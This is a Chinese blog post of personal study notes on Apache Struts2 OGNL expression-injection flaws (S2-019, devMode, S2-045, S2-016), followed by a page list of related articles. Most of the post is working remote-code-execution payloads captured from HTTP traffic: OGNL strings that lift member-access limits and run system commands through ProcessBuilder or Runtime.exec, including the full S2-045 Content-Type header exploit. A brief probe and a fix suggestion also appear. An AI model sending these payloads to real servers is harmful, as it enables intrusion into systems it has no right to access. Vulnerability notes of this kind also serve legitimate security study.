Struts2 原理笔记

最新推荐文章于 2023-01-04 11:10:18 发布
最新推荐文章于 2023-01-04 11:10:18 发布
阅读量634 收藏
点赞数
分类专栏: WEB安全 文章标签: 安全 struts2.0 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rigous/article/details/74498179
版权

Struts2的漏洞几乎已经用烂了,但如果提到手工构造ognl表达式,首先是脑子一蒙。如果说出045、016、032的区别,恐怕也说不出来。下午整理了一下,随时更新

Struts漏洞的核心问题是ognl表达式,可参考链接:

http://blog.csdn.net/ljhabc1982/article/details/6312023

通过wireshark抓包,得到利用http报文如下:


S2-019


Struts2 由于启用开发模式

debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),#req=@org.apache.struts2.ServletActionContext@getRequest(),#resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'whoami'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[1000],#d.read(#e),#resp.println(#e),#resp.close()


2016 devMode

GET /xxxxx.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=whoami HTTP/1.0


S2-045 由于httpheader中 content-type解析导致,可参考:

http://paper.seebug.org/241/?from=timeline&isappinstalled=0

sink点  LocalizedTextUtil.findText


Content-Type: %{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}


S2-016  


请求参数中对  action  redirect   redirectAction   值进行了ognl表达式运行 


sink      TextParseUtil    stack.findValue()方法


测试方法     ?redirect:${3*4}


修改方法:升级struts框架,或者过滤 #符号

rigous
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
黑马程序员Struts2笔记
11-28
通过学习这些笔记,开发者将能够理解Struts2的工作原理,并具备使用Struts2开发Web应用的基础能力。同时,对于进一步学习Spring MVC或其他MVC框架也会有所帮助,因为很多设计思想和技术原理都是相通的。
ref:Struts2 命令执行系列回顾
weixin_30266885的博客
06-21 953
ref:http://www.zerokeeper.com/vul-analysis/struts2-command-execution-series-review.html Struts2 命令执行系列回顾 Jun 05,2017in漏洞分析lang繁read (3897) 一直都想分析下 Struts2 命令执行系列的的漏洞,但是能力有限,对 ja...
Struts2 S2-057 WAF防护绕过预警
Baidu_Secrity的博客
08-29 742
OpenRASP是百度安全推出的一款开源、免费的自适应安全产品,目前与国际知名非盈利安全组织 OWASP(Open Web Application Security Project)达成...
泛微 E-Mobile Ognl 表达式注入
m0_51747642的博客
07-30 3891
泛微OA办公系统是一款协调办公软件。 泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。 使用bp抓包 发送到重发器更改请求头为POST 一执行下面面的代码就直接执行命令了 message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse...
Java培训 | 服务攻防之框架Struts2
weixin_45695430的博客
06-30 1293
Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控制器能够与Servlet API完全脱离开,所以Struts 2可以理解为WebWork的更新产品。虽然从Struts 1到Struts 2有着太大的变化,但是相对于WebWork,Struts 2的变化很小_java培训。...
java struts2 漏洞复现合集
whatday的专栏
08-31 4215
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
struts2图表笔记
09-20
总结,Struts2动态图表笔记主要涉及Struts2框架的使用、后端与前端数据交互、动态图表的原理与实现,以及如何利用Struts2与其他资源进行整合。通过学习和实践,开发者可以有效地在Web应用中创建出具有吸引力和实用性...
struts2 学习重点笔记
05-24
这是学习struts2时记得重点笔记,包括了一些原理,ognl语句的编写,以及如何设置拦截器等等一些基本知识,起到复习和巩固的作用
Struts2 S2-032漏洞复现
最新发布
ZJT6666666的博客
01-04 495
Struts2 S2-032漏洞复现
struts2对Ognl的封装--MemberAccess
java12345678
03-19 1197
Ognl的扩展点: http://java12345678.iteye.com/blog/2031790   MemberAccess接口  定义了对于Memeber(Constructor,Method,Filed是否可以访问),Ognl默认实现DefaultMemberAccess对非公有Member不可以访问。  Struts2对DefaultMemberAccess进行了扩展...
Struts2 devMode远程代码执行漏洞检测利用
a1b2c3是弱口令
12-10 4548
Apache Struts 2是世界上最流行的Java Web服务器框架之一,当Struts2开启devMode模式时,将导致严重远程代码执行漏洞。如果WebService 启动权限为最高权限时,可远程执行任意命令,包括关机、建立新用户、以及删除服务器上所有文件等等。 检测 poc: #!/usr/bin/env python #coding:utf-8 -*- import sys impo...
墨者学院之Apache Struts2远程代码执行漏洞(S2-032)复现
liangzi321321的博客
09-22 768
本题的解题方向是struts2的S2-032漏洞,启用动态方法调用时,可以通过方法:前缀执行远程代码执行。 method: < name > Action 前缀去调用声明为 public 的函数,但是在低版本 的Strtus2中并不会对 name 方法值做 OGNL 计算,反而在高版本中会进行计算。 其中需要利用exp进行实现: 首先构造poc 编码前:由编码后解析成的代...
Struts2漏洞复现合集
weixin_42345596的博客
07-11 2899
1. Struts2简介 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务
struts2漏洞集合
angaoux03775的博客
10-27 1741
[+]1 S2-005 CVE-2010-1870CVE-2010-1870 影响版本:Struts 2.0.0 – Struts 2.1.8.1 官方公告:http://struts.apache.org/release/2.2.x/docs/s2-005.html ('\43_memberAccess.allowStaticMethodAccess')(a)=true...
Structs2漏洞学习
痴人说梦梦中人
09-12 403
structs2-033漏洞利用: :%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0])...
【Python】STR2漏洞综合扫描+源码分析
浪子燕青的博客
01-18 2709
花了半天写完的~~ 还不错~~ 现在同目录下创建url.txt  将收集到的url放进去  就ok~~ 最后成功的会在同目录下生产success.txt~~ 附上源码~~~ # -*-coding:utf-8-*- import requests import time print unicode(''' 作者:浪子燕青 作者QQ:982722261
S2-045远程代码执行漏洞
a1b2c3是弱口令
12-20 2470
Apache Struts 2被曝存在远程命令执行漏洞漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。 影响范围 Struts 2.3.5 – Struts 2.3.31 Struts ...
S2-048远程执行代码漏洞
江小白
07-20 664
受影响的版本:2.0.0 - 2.3.32 利用 这个环境是一个struts-2.3.32展示,在tomcat-8.5中。环境运行后,访问http://your-ip:8080/showcase/以查看struts2 showcase。 Access Integration / Struts 1集成: OGNL表达式漏洞位置是Gangster Name表单。 输入${233*233}...
探索Struts2:工作原理与替代框架比较
Struts2笔记 Struts2是基于Java的开源Web应用框架,它在MVC(Model-View-Controller)架构模式的实现上是对经典Struts1的升级和改进。Struts1曾经是Java Web开发中的主流框架,尤其是Model1(JSP+JavaBean)和Model...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值